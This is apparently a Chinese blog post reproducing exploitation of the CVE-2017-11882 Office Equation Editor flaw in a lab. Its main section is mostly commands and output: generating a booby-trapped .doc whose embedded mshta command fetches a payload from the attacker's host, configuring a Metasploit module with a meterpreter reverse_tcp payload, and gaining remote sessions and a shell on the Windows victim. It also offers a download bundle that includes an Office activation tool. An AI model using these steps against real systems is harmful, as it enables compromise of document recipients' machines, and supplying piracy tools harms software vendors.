2. 程式人生 > >CVE-2017-11882漏洞 Msf利用復現

CVE-2017-11882漏洞 Msf利用復現

阿新 發佈:2017-11-23
service serve emctl ssi 激活工具 本機 cal ret 目前

中午時候收到了推送的漏洞預警,在網上搜索相關信息看到很多大牛已經開發出生成doc文檔的腳本和msf的poc,本文記錄CVE-2017-11882 漏洞在 Msf下的利用。

0x00 漏洞簡介

2017年11月14日,微軟發布了11月份的安全補丁更新,其中比較引人關註的莫過於悄然修復了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞為Office內存破壞漏洞,影響目前流行的所有Office版本。攻擊者可以利用漏洞以當前登錄的用戶的身份執行任意命令。 由於漏洞影響面較廣,漏洞披露後,金睛安全研究團隊持續對漏洞相關攻擊事件進行關註。11月19日,監控到了已有漏洞POC在網上流傳,隨即迅速對相關樣本進行了分析。目前該樣本全球僅微軟殺毒可以檢測。

  • 漏洞影響版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

0x01 利用工具清單:

a) tcp反彈:kali 172.16.253.76

b) 安裝office2013的系統:win7 172.16.253.4

1. Msf 用到的 Poc

2. office2013、激活工具

3. win7旗艦版ISO鏡像

以上工具已經打包好,下載地址:

鏈接:http://pan.baidu.com/s/1o8635Om 密碼:xl91

技術分享圖片

0x02 利用過程

1. 生成doc

#安裝啟動nginx
[root@ihoneysec ~]# yum -y install nginx
[root@ihoneysec ~]# cd /usr/share/nginx/html/   
[root@ihoneysec html]# systemctl start nginx

#下載生成doc的python腳本
[root@ihoneysec ~]# git clone https://github.com/Ridter/CVE-2017-11882.git
[root@ihoneysec ~]# cd CVE-2017-11882/
[root@ihoneysec CVE-2017-11882]# ls
Command109b_CVE-2017-11882.py  Command43b_CVE-2017-11882.py  example  README.md

#生成測試doc
[root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
[*] Done ! output file --> cve.doc
[root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

#生成msf利用的doc
[root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "mshta http://172.16.253.76:8080/abc" -o cve2.doc
[*] Done ! output file --> cve2.doc
[root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

#放到網站根目錄
[root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
404.html  50x.html  cve.doc  cve2.doc  index.html  nginx-logo.png  poweredby.png

  

2. 測試正常彈出calc.exe計算器

技術分享圖片

3. kali msf配置Poc:

root@kali:~# cd /
# 將下載好的漏洞模塊放在msf任意目錄下
root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
# 檢查ip地址
root@kali:/mnt/hgfs/kalishare# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
        inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
        RX packets 3136  bytes 987402 (964.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 255  bytes 20912 (20.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
# 啟動postgresql服務,打開msf
root@kali:/mnt/hgfs/kalishare# service postgresql start  
root@kali:/mnt/hgfs/kalishare# msfconsole 
                                                  
...

       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1683 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
# 搜索cve_2017_11882 漏洞模塊
msf > search cve_2017_11882
Matching Modules
================
   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   exploit/windows/smb/cve_2017_11882                   normal  Microsoft Office Payload Delivery

# 使用該模塊
msf > use exploit/windows/smb/cve_2017_11882 
# 設置payload為反彈tcp
msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
# 設置本機ip
msf exploit(cve_2017_11882) > set lhost 172.16.253.76
lhost => 172.16.253.76
# 設置uri的路徑,要與第一步生成doc時配置一致
msf exploit(cve_2017_11882) > set URIPATH abc
URIPATH => abc
# 檢查當前配置
msf exploit(cve_2017_11882) > show options

Module options (exploit/windows/smb/cve_2017_11882):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  abc              no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: ‘‘, seh, thread, process, none)
   LHOST     172.16.253.76    yes       The listen address
   LPORT     4444             yes       The listen port

...

# 啟動利用後,msf會監聽本機8080端口,如果win7機器打開doc觸發訪問172.16.253.76:8080/abc就會得到反彈到4444端口的tcp會話
msf exploit(cve_2017_11882) > exploit 
[*] Exploit running as background job 0.
# 開始監聽
[*] Started reverse TCP handler on 172.16.253.76:4444 
msf exploit(cve_2017_11882) > [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://172.16.253.76:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://172.16.253.76:8080/abc"
msf exploit(cve_2017_11882) > [*] 172.16.253.4     cve_2017_11882 - Delivering payload
[*] Sending stage (179267 bytes) to 172.16.253.4 #收到反彈tcp連接
[*] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
[*] 172.16.253.4     cve_2017_11882 - Delivering payload
[*] Sending stage (179267 bytes) to 172.16.253.4
[*] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

msf exploit(cve_2017_11882) >
msf exploit(cve_2017_11882) >
msf exploit(cve_2017_11882) > sessions 
# 查看已經建立的反彈會話
Active sessions
===============

  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  win7-PC\win7 @ WIN7-PC  172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
# 進入id為1的會話
msf exploit(cve_2017_11882) > sessions -i 1
[*] Starting interaction with 1...
# 驗證得到反彈連接是否是win7機器ip
meterpreter > ipconfig

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:72:2e:7d
MTU          : 1500
IPv4 Address : 172.16.253.4
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::c15d:3813:94ec:d6c8
IPv6 Netmask : ffff:ffff:ffff:ffff::

......
# 進入命令模式
meterpreter > shell
Process 2924 created.
Channel 1 created.
Microsoft Windows [?汾 6.1.7601]
??????? (c) 2009 Microsoft Corporation???????????????
# 查看當前系統用戶、主機名
C:\Windows\system32>net user
net user

\\WIN7-PC ????????

-------------------------------------------------------------------------------
Administrator            Guest                    win7                     
??????????ɡ?


C:\Windows\system32>

  

CVE-2017-11882漏洞 Msf利用復現

相關推薦

CVE-2017-11882漏洞 Msf利用復現

service serve emctl ssi 激活工具 本機 cal ret 目前 中午時候收到了推送的漏洞預警,在網上搜索相關信息看到很多大牛已經開發出生成doc文檔的腳本和msf的poc,本文記錄CVE-2017-11882 漏洞在 Msf下的利用。 0x00 漏

CVE-2017-11882漏洞復現

作者:zero   漏洞資訊:CVE-2017-11882     2017年11月14日,微軟釋出了11月份的安全補丁更新,其中比較引人關注的莫過於悄然修復了潛伏17年之久的Office遠端程式碼執行漏洞(CVE-2017-11882)。該漏洞為Office內&nbs

cve-2017-11882漏洞分析報告

軟體名稱:Office2016以下 軟體版本:2016以下 漏洞模組:EQNEDT32.EXE 模組版本:6.1.95.45 編譯日期:2000-11-9 作業系統:Windows XP/2003/7/8.1/10 漏洞編號:cve-2017-11882 危害等級:高危 漏洞型別:緩衝區溢位

[漏洞復現] CVE-2017-11882 通殺所有office版本

CVE-2017-11882 office漏洞 黑客 Kali Linux 滲透測試 1、漏洞概述這幾個月來,針對微軟Office套件最火熱最流行的攻擊手段,莫過於基於CVE-2017-11882的漏洞利用。2017年11月14號,微軟推送了常規的安全更新,其中,關於CVE-2017-11

隱藏17年的Office遠程代碼執行漏洞CVE-2017-11882

portal round splay avi uid windows 1.10 分享 ret Preface   這幾天關於Office的一個遠程代碼執行漏洞很流行,昨天也有朋友發了相關信息,於是想復現一下看看,復現過程也比較簡單,主要是簡單記錄下。   利用腳本Git

Office CVE-2017-11882復現

office cve-2017-11882 繼續練習metasploit的使用,這次復現的是11882這個漏洞,但是最後並沒有成功(已經把我逼瘋)。這裏記錄兩個復現方式,希望有緣人能夠為小女子解答最後不成功的原因,小女子感激不盡。 就不去介紹這個漏洞了,網上搜一大把的。下面直接放兩個方式的截圖以及簡

CVE-2017-8890漏洞分析和利用-概覽篇

本文永久連結:https://thinkycx.me/posts/2018-10-30-a-glance-at-CVE-2017-8890.html 最近在忙開題的事情,期間和同學聊了一下這個漏洞,想起來之前寫過一篇概覽的介紹,因此發出來給有需要的同學參考一下,後續可能還會再整理幾篇文章。這

[漏洞樣本分析]CVE-2017-11882

環境: Win7(專業版) office 2003 sp3(完全版) 工具: Ollydbg IDA Pro PEid Kali-Linux metasploit POC來源: https://github.com/embedi/CVE-2017-11882 漏洞介紹

[漏洞分析]對CVE-2017-11882的分析

對CVE-2017-11882的分析 漏洞簡介: 這個漏洞出現在一個老舊的微軟工具Equation Editor中的EQNEDT32.exe可執行程式,這個工具的作用是插入數學公式,雖然在Office 2007後就被取代,但出於早期相容性的考慮仍然得以保留。如圖所示。 漏洞分析

利用cve-2017-11882的一次滲透測試

利用工具:https://github.com/Ridter/CVE-2017-11882/  影響版本: office 2003 office 2007 office 2010 office 2013 office 2016 一、思路整理 整體思路如上,通過執行遠端的flag.txt裡包

CVE-2017-11882復現-office命令執行

同時 黑客攻擊 註意 asc cati 保存 bsp close misc 0x01 前言 11月14日,微軟按照慣例發布了11月的安全更新,隨後不久,安全公司EMBEDI在官方博客上公開了其向微軟提交的編號為CVE-2017-11882的Office遠程代碼執行漏洞:

Ubuntu核心提權:CVE-2017-16995漏洞復現

一.漏洞影響版本Linux Kernel Version 4.14-4.4 (主要影響Ubuntu和Debian發行版)二.環境準備ubuntu 16.4 核心版本 4.4.0-81-generic指令碼下載:https://download.csdn.net/downloa

CVE-2017-11882 POC 全版本通殺

技術 ref com blog bsp mbed alt https hub POC https://github.com/embedi/CVE-2017-11882 CVE-2017-11882 POC 全版本通殺

Office--CVE-2017-11882【遠程代碼執行】

== nbsp content trail pic rim argparse .cn from Office遠程代碼執行漏洞現POC樣本 最近這段時間CVE-2017-11882挺火的。關於這個漏洞可以看看這裏:https://www.77169.com/html/1861

cve-2017-11882生成office惡意文件

offic 運行 comm ice sha lis and uid code 2017年11月14日,微軟發布了11月份的安全補丁更新,其中比較引人關註的莫過於悄然修復了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞為Office內存破

cve-2017-11882 poc分析

目錄 CVE-2017-11882 poc分析 0x00 工具&實驗環境 0x01 分析行為 第一步:觀察poc行為 第二步:找出計算器被彈出的地方 0x02 除錯定位漏洞觸發點 0x03 分析漏洞成因

CVE-2017-12617漏洞分析

CVE-2017-12617 Apache Tomcat團隊10月3日宣佈,如果配置了預設servlet,則在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有作業系統上的潛在危險的遠端執行程式碼(RCE)漏洞

CVE-2017-6090&msf的基本使用(一)

## 滲透環境的搭建 phpcollab的下載:[phpCollab-v2.5.1.zip](https://files.cnblogs.com/files/Lmg66/phpCollab-v2.5.1.zip) 解壓到www目錄,給www目錄許可權,因為這個漏洞需要寫的許可權 `chmod 777 wwww

漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

art cal mage http test ip地址 get for oot 早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NS

Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271)檢測與利用復現

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。 漏洞環境搭建 可以參考: https://blog.csdn.net/q